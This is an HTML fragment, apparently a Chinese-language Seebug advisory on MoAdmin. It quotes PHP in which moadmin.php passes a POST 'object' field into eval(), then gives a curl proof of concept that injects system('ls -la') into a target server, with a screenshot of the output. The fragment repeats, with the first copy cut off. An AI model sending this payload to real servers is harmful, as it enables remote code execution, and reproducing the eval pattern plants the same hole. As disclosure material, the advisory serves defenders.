<ul><li>/moadmin.php</li></ul><pre class=""> /** * Saves an object * * @param string $collection * @param string $obj * @return array */ public function saveObject($collection, $obj) { eval('$obj=' . $obj . ';'); //cast from string to array return $this->mongo->selectCollection($collection)->save($obj); } …. $action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections'); if (isset($_POST['object'])) { if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { return $this->_dumpFormVals(); } else { $action = 'editObject'; $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.'; } </pre><p>saveObject 直接将用户传入的object带入eval执行,造成任意代码执行漏洞。<br></p><p>使用命令,在目标服务器上执行ls命令:</p><pre class="">curl http://hatsuyuki.sakura/moadmin/moadmin.php -d "object=1;system('ls -la');exit"</pre><p>得到回显:</p><p> </p><p><img alt="1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png"...
<ul><li>/moadmin.php</li></ul><pre class=""> /** * Saves an object * * @param string $collection * @param string $obj * @return array */ public function saveObject($collection, $obj) { eval('$obj=' . $obj . ';'); //cast from string to array return $this->mongo->selectCollection($collection)->save($obj); } …. $action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections'); if (isset($_POST['object'])) { if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { return $this->_dumpFormVals(); } else { $action = 'editObject'; $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.'; } </pre><p>saveObject 直接将用户传入的object带入eval执行,造成任意代码执行漏洞。<br></p><p>使用命令,在目标服务器上执行ls命令:</p><pre class="">curl http://hatsuyuki.sakura/moadmin/moadmin.php -d "object=1;system('ls -la');exit"</pre><p>得到回显:</p><p> </p><p><img alt="1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" src="https://images.seebug.org/@/uploads/1433921840066-1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" data-image-size="1044,160"><br></p>
